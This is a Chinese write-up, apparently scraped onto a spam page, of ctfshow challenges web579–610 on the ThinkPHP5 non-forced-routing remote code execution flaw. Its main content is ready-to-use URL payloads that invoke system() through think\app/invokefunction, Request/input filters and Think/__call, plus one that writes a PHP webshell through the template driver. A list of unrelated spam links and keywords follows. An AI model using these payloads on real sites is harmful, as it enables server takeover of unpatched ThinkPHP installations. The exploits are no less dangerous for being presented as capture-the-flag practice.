当前位置: 首页 > news >正文

网站开发时间5118素材网站

网站开发时间,5118素材网站,全国建设交易信息网站,商丘网站建设哪家好目录 非强制路由RCE漏洞 web579 web604 web605 web606 web607-610 前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce 下面介绍非强制路由RCE漏洞 非强制路由RCE漏洞原理 非强制路由相当于开了一个大口子,可以任意调用当前框…

目录

非强制路由RCE漏洞

web579 

web604 

web605 

web606

web607-610


前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce

下面介绍非强制路由RCE漏洞

非强制路由RCE漏洞原理

非强制路由相当于开了一个大口子,可以任意调用当前框架中的任意类的任意方法并传参。

下面是该漏洞的利用条件:

 

要修复这个漏洞非常简单,启用强制路由即可

很简单的道理,举个例子

index模块下控制器定义一个Address类,类里定义一个search()方法,并定义响应的路由访问+传参。

 

可以/search/5/4访问并传参

 

 因为没有开启强制路由,所以下面这种方式可以达成一样的效果

?s=index/Address/search&id=5&uid=4 

 

而且当前框架中的任意类的任意方法都是可以被直接调用的,所以我们只要找到恶意类的恶意方法传参即可,试着拿一个payload弹一个计算器,成功。

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=calc

ok我们已经实现了从0到1的突破了,剩下的就是各种payload的积累

从payload反推是很容易的,下面不再演示

贴出一篇文章

ThinkPHP5框架缺陷导致远程命令执行 

先介绍一个通杀解:

利用\think\view\driver\Think类的__call方法

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>

web579 

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

web604 

?s=index/\think\Request/input&filter[]=system&data=tac /f*

web605 

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php system('tac /f*');?>

web606

invokefunction大写即可

?s=index/think\app/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

或者:

?s=index/\think\Container/invokeFunction&function=assert&vars[0]=system('tac /f*');

web607-610

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>
http://www.ysxn.cn/news/2007.html

相关文章:

  • 容易导致网站作弊的几个嫌疑郑州厉害的seo顾问公司
  • 自己做黑彩网站百度手机助手下载2021新版
  • 免费发布的网站营销100个引流方案
  • 网站推广积分每日英语新闻
  • 青岛网站制作选ls15227网站怎么做推广和宣传
  • 著名建筑网站全国防疫大数据平台
  • 大连网站建站营销型网站建设的5大技巧
  • 狮山网站建设广告公司注册
  • 网站建设操作网站市场推广
  • 网站程序找人做还是自己做北京搜索引擎推广服务
  • 北京网站建设联系兴田德润个人怎么接外贸订单
  • 网站建设flash设计大数据查询个人信息
  • 国内消息最新新闻网站推广优化排名
  • 舟山网站建设公司百度百家号官网登录
  • wordpress 隐藏目录免费seo在线优化
  • 做外贸在哪个网站比较好免费查权重工具
  • 合肥网页网站制作最近的国际新闻
  • 如何鉴别网站有没有做301重定向深圳 网站制作
  • dw可以做有后台的网站么?公司建网站流程
  • c语言网站建设免费注册个人网站
  • 微商城怎么弄win7优化软件
  • 西安网站建设网网站查询信息
  • 哈尔滨网站优化公司外贸网站平台哪个好
  • 浙江网站推广已备案域名30元
  • seo做多个网站百度小说排行榜第一名
  • 手机app软件开发价格游戏优化
  • 成都网站建设索q479185700小说网站排名
  • 淘宝网站是哪个公司做的糕点烘焙专业培训学校
  • 太原富库网站建设深圳seo招聘
  • 潍坊做网站联系方式引流推广平台软件